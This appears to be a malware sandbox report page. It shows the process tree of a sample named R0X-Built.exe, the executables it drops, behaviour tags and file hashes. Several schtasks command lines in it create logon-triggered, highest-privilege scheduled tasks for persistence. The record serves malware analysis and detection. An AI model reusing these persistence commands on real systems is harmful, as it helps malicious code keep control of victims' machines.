-
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netprofm -p -s netprofm1⤵PID:1212
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog1⤵
- Drops file in System32 directory
PID:1324
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc1⤵PID:1344
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc1⤵PID:1392
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem1⤵PID:1400
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s Themes1⤵PID:1424
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager1⤵PID:1580
-
C:\Windows\system32\sihost.exesihost.exe2⤵PID:712
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s SENS1⤵PID:1616
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder1⤵PID:1676
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p1⤵PID:1732
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵PID:1792
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp1⤵PID:1868
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵PID:1972
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵PID:1968
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection1⤵PID:1832
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository1⤵PID:1932
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵PID:2132
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation1⤵PID:2224
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p1⤵PID:2320
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT1⤵PID:2340
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer1⤵PID:2356
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent1⤵PID:2428
-
C:\Windows\sysmon.exeC:\Windows\sysmon.exe1⤵PID:2436
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks1⤵PID:2464
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2480
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService1⤵PID:2492
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc1⤵PID:2760
-
C:\Windows\system32\wbem\unsecapp.exeC:\Windows\system32\wbem\unsecapp.exe -Embedding1⤵PID:2024
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc1⤵PID:2752
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵PID:3312
-
C:\Users\Admin\AppData\Local\Temp\R0X-Built.exe"C:\Users\Admin\AppData\Local\Temp\R0X-Built.exe"2⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:5024 -
C:\Windows\SysWOW64\schtasks.exe"schtasks" /create /tn "$srr-powershell" /sc ONLOGON /tr "C:\Users\Admin\AppData\Local\Temp\R0X-Built.exe" /rl HIGHEST /f3⤵
- Creates scheduled task(s)
PID:2740
-
-
C:\Users\Admin\AppData\Roaming\Windows\$srr-powershell.exe"C:\Users\Admin\AppData\Roaming\Windows\$srr-powershell.exe"3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1480 -
C:\Windows\SysWOW64\schtasks.exe"schtasks" /create /tn "$srr-powershell" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\Windows\$srr-powershell.exe" /rl HIGHEST /f4⤵
- Creates scheduled task(s)
PID:3320
-
-
-
C:\Users\Admin\AppData\Local\Temp\install.exe"C:\Users\Admin\AppData\Local\Temp\install.exe"3⤵
- Executes dropped EXE
PID:4776
-
-
C:\Windows\SysWOW64\SCHTASKS.exe"SCHTASKS.exe" /create /tn "$77R0X-Built.exe" /tr "'C:\Users\Admin\AppData\Local\Temp\R0X-Built.exe'" /sc onlogon /rl HIGHEST3⤵
- Creates scheduled task(s)
PID:2284
-
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc1⤵PID:3428
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo1⤵PID:3492
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:3852
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
- Suspicious use of UnmapMainImage
PID:3920
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵PID:4000
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k UdkSvcGroup -s UdkUserSvc1⤵PID:4060
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{973D20D7-562D-44B9-B70B-5A0F49CCDF3F}1⤵PID:4256
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k osprivacy -p -s camsvc1⤵PID:4400
-
C:\Windows\system32\SppExtComObj.exeC:\Windows\system32\SppExtComObj.exe -Embedding1⤵PID:2100
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager1⤵PID:2684
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc1⤵PID:4916
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc1⤵PID:1368
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc1⤵
- Modifies data under HKEY_USERS
PID:3684
-
C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service1⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:2472
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc1⤵PID:1444
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵PID:3660
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc1⤵PID:4180
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:1420
-
C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding1⤵
- Checks BIOS information in registry
- Suspicious behavior: EnumeratesProcesses
PID:2072
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
162KB
MD5152e3f07bbaf88fb8b097ba05a60df6e
SHA1c4638921bb140e7b6a722d7c4d88afa7ed4e55c8
SHA256a4623b34f8d09f536e6d8e2f06f6edfb3975938eb0d9927e6cd2ff9c553468fc
SHA5122fcc3136e161e89a123f9ff8447afc21d090afdb075f084439b295988214d4b8e918be7eff47ffeec17a4a47ad5a49195b69e2465f239ee03d961a655ed51cd4
-
Filesize
409KB
MD5a0f5aa5764c4f66eee82f857f9f447b6
SHA13c3a780d020cb3eb3088223443fe813abb95dccd
SHA25643c6b9b6c241dbd6ad1bde7980026235373374d5e836fb6c794354a15e678ef3
SHA512458c03ae490e409598b8e9e89911b0757fb61411fbc45a60ecefed3c13d0fc96b7bc205afe1fb3e0f7585eb163f102754ec9259691eca1bfa00b028f74eb8384
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82